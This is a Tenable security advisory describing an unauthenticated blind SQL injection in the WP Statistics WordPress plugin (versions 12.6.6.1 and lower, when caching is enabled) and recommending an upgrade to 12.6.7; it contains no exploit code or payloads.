WP Statistics WordPress Plugin Vulnerable to Unauthenticated Blind SQL Injection
![](https://www.tenable.com/sites/default/files/images/articles/Tenable_Research_RapidResponse_Medium_38.jpg)
Popular WordPress Plugin with over half a million installations is potentially vulnerable to unauthenticated blind SQL injection attacks.
背景說明
On July 1, maintainers of WP Statistics, a popular WordPress plugin for gathering website statistics about visitor data that boasts over 500,000 active installations, released an update to address a serious vulnerability.
分析
Researcher Thomas Chauchefoin discovered and reported an unauthenticated blind SQL injection (SQLi) in the WP Statistics plugin versions 12.6.6.1 and lower. The vulnerability exists in a non-default configuration of the plugin. By default, the Cache Plugin setting in WP Statistics is disabled.
However, enabling this setting could allow an unauthenticated remote attacker to pass a blind SQLi command via the WP Statistics API endpoint. Since the SQLi vulnerability affects both SELECT and UPDATE queries, this could potentially be abused to perform a variety of actions, including changing the administrator credentials, adding another administrator account to the vulnerable WordPress site, exfiltrating user data and more.
This isn’t the first SQLi discovered in the WP Statistics plugin. Researchers at Sucuri blogged about their discovery of an SQLi in 2017, and researcher Marcin Probola discovered a blind SQLi in the plugin back in 2015.
概念驗證
A proof-of-concept (PoC) was shared by the researcher in the WP Vulnerability database posting.
解決方法
This vulnerability is addressed in WP Statistics version 12.6.7 or greater. While the vulnerable configuration is not enabled by default, with over a half a million active installations it is likely that a large number of WP Statistics users are vulnerable. All users should upgrade to the latest version of the plugin as soon as possible.
找出受影響的系統
A list of Tenable plugins to identify this vulnerability will appear here as they’re released.
取得更多資訊
加入 Tenable Community 的 Tenable 安全回應團隊。
深入瞭解 Tenable,這是用於全面管理新型攻擊破綻的首創 Cyber Exposure 平台。
Get a free 60-day trial of Tenable.io Vulnerability Management.
相關文章
- Threat Intelligence
- Threat Management
- Vulnerability Management
- Vulnerability Scanning